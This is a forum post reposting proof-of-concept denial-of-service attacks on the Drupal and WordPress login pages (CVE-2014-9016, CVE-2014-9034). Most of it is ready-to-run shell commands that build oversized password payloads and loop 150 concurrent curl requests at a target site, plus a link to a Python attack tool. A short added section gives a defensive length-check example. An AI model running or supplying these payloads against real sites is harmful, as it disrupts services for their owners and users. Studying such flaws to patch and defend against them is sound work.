devilox

CVE-2014-9016 and CVE-2014-9034 Drupal & WordPress Denial of Service


Drupal Denial of Service CVE-2014-9016

Generate a payload and try with a non-valid user:


$ echo -n "name=NO-VALID-USER&pass=" > no_valid_user_payload && printf "%s" {1..1000000} >> no_valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> no_valid_user_payload

$ time curl --data @no_valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &

Generate a payload and try with a valid user:


$ echo -n "name=admin&pass=" > valid_user_payload && printf "%s" {1..1000000} >> valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> valid_user_payload

$ time curl --data @valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &

Perform a DoS with a valid user:


$ for i in `seq 1 150`; do (curl --data valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &); sleep 0.25; done

WordPress Denial of Service CVE-2014-9034

Generate a payload and try with a non-valid user:


$ echo -n "log=NO-VALID-USER&pwd=" > payload && printf "%s" {1..1000000} >> payload && echo -n "&wp-submit=Log In" >> payload

$ time curl --data @payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &

Generate a payload and try with a valid user:


$ echo -n "log=admin&pwd=" > valid_user_payload && printf "%s" {1..1000000} >> valid_user_payload && echo -n "&wp-submit=Log In" >> valid_user_payload

$ time curl --data @valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &

Perform a DoS with a valid user:


$ for i in `seq 1 150`; do (curl --data valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &); sleep 0.25; done

Python Code

https://github.com/c0r3dump3d/wp_drupal_timing_attack

Source: CVE-2014-9016 and CVE-2014-9034 Proof of Concept ~ Hacking while you're asleep

Edited by devilox
  • Upvote 1
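
Both proofs of concept above depend on the login handler hashing a password of any length, so this added example (not part of the original post or the linked repository) shows the server-side length check that bounds that cost. `stretch` is a simplified stand-in for an iterated password hash, not Drupal's or WordPress's code, and `MAX_PASSWORD_BYTES` and `ITERATIONS` are assumed values.

```python
import hashlib
import hmac
import time

MAX_PASSWORD_BYTES = 4096  # assumed cap, chosen for illustration
ITERATIONS = 1 << 12       # assumed work factor


def stretch(password: bytes, salt: bytes, iterations: int = ITERATIONS) -> bytes:
    """Simplified iterated hash (stand-in, not the CMS code).

    Every round re-hashes digest + password, so the work grows with
    iterations * len(password).
    """
    digest = hashlib.sha512(salt + password).digest()
    for _ in range(iterations):
        digest = hashlib.sha512(digest + password).digest()
    return digest


def check_login(password: bytes, salt: bytes, stored: bytes,
                max_len: int = MAX_PASSWORD_BYTES) -> str:
    """Return 'rejected', 'ok' or 'denied'; oversized input is never hashed."""
    if len(password) > max_len:
        return "rejected"
    candidate = stretch(password, salt)
    return "ok" if hmac.compare_digest(candidate, stored) else "denied"


def timed(fn, *args):
    """Run fn(*args) and return (result, elapsed seconds)."""
    start = time.perf_counter()
    result = fn(*args)
    return result, time.perf_counter() - start


if __name__ == "__main__":
    salt = b"constructed-salt"                 # constructed sample values
    stored = stretch(b"correct horse", salt)
    oversized = b"1234567890" * 6554           # ~64 KiB, constructed
    _, unguarded = timed(stretch, oversized, salt)
    verdict, guarded = timed(check_login, oversized, salt, stored)
    print(f"no length check: {unguarded:.3f}s of hashing")
    print(f"with length check: {verdict} in {guarded:.6f}s")
```

The check has to run before any hashing starts; a limit enforced only in the browser form does nothing against a request sent with curl.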